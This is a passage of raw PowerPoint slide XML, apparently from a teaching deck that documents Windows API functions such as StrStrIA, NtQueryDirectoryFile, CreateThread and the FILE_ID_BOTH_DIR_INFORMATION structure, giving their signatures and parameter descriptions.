              <a:t>   size_t *pReturnValue,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>   char *mbstr,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>   size_t sizeInBytes,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>   const wchar_t *wcstr,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>   size_t count</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5083175" y="1608455"/>
            <a:ext cx="6518910" cy="1734820"/>
            <a:chOff x="8286" y="2697"/>
            <a:chExt cx="10266" cy="2732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形标注 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8286" y="2697"/>
              <a:ext cx="10267" cy="2733"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -65749"/>
                <a:gd name="adj2" fmla="val -933"/>
                <a:gd name="adj3" fmla="val 16667"/>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8287" y="2901"/>
              <a:ext cx="10265" cy="2325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3000">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Converts a sequence of wide characters to a corresponding sequence of multibyte characters. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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StrStrIA</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530225" y="4732655"/>
            <a:ext cx="9890125" cy="883920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] pszFirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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A pointer to the null-terminated string being searched.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>[in] pszSrch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">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A pointer to the substring to search for.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905510" y="1673225"/>
            <a:ext cx="3429000" cy="2245360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>PCSTR StrStrIA(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in] PCSTR pszFirst,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in] PCSTR pszSrch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083175" y="1928495"/>
            <a:ext cx="6519545" cy="1735455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61415"/>
              <a:gd name="adj2" fmla="val 384"/>
              <a:gd name="adj3" fmla="val 16667"/>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5083810" y="2058035"/>
            <a:ext cx="6518275" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finds the first occurrence of a substring within a string. The comparison is not case-sensitive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300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NtQueryDirectoryFile</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199390" y="4458970"/>
            <a:ext cx="9890125" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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[in] FileHandle</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A handle to the directory or file for which you want to retrieve directory information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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[out] IoStatusBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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A pointer to an IO_STATUS_BLOCK structure that receives the final completion status and information about the operation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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[out] FileInformation</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A pointer to a buffer that receives the desired information about the file. The structure of the information returned in the buffer is defined by the FileInformationClass parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348615" y="1019175"/>
            <a:ext cx="6770370" cy="3325495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>__kernel_entry NTSYSCALLAPI NTSTATUS NtQueryDirectoryFile(</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HANDLE                 FileHandle,</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optional] HANDLE                 Event,</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optional] PIO_APC_ROUTINE        ApcRoutine,</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optional] PVOID                  ApcContext,</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[out]          PIO_STATUS_BLOCK       IoStatusBlock,</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[out]          PVOID                  FileInformation,</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ULONG                  Length,</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FILE_INFORMATION_CLASS FileInformationClass,</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BOOLEAN                ReturnSingleEntry,</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optional] PUNICODE_STRING        FileName,</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BOOLEAN                RestartScan</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7280275" y="1387475"/>
            <a:ext cx="4805045" cy="2576830"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="4058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="4058"/>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11466" y="1996"/>
              <a:ext cx="7566" cy="3415"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2700">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The NtQueryDirectoryFile routine returns information about files and directories in a directory.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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FILE_ID_BOTH_DIR_INFORMATION </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9" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348615" y="1019175"/>
            <a:ext cx="4446905" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _FILE_ID_BOTH_DIR_INFORMATION {</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ULONG         NextEntryOffset;</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ULONG         FileIndex;</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LARGE_INTEGER CreationTime;</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LARGE_INTEGER LastAccessTime;</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LARGE_INTEGER LastWriteTime;</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LARGE_INTEGER ChangeTime;</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LARGE_INTEGER EndOfFile;</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LARGE_INTEGER AllocationSize;</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ULONG         FileAttributes;</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ULONG         FileNameLength;</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ULONG         EaSize;</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CCHAR         ShortNameLength;</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WCHAR         ShortName[12];</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LARGE_INTEGER FileId;</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WCHAR         FileName[1];</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FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121275" y="1019175"/>
            <a:ext cx="6709410" cy="1701165"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121593" y="1200785"/>
            <a:ext cx="6708775" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The structure is used to query file reference number information for the files in a directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911090" y="2978785"/>
            <a:ext cx="6919595" cy="2960370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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NextEntryOffset</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Byte offset of the next FILE_ID_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer. This member is zero if no other entries follow this one.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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FileIndex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS, in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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CreateThread</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199390" y="4458970"/>
            <a:ext cx="11655425" cy="1699260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="8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[in] dwStackSize</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 initial size of the stack, in bytes. The system rounds this value to the nearest page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="8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[in] lpStartAddress</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A pointer to the application-defined function to be executed by the thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="8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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[out, optional] lpThreadId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A pointer to a variable that receives the thread identifier.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348615" y="1019175"/>
            <a:ext cx="6770370" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HANDLE CreateThread(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>  [in]            SIZE_T                  dwStackSize,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
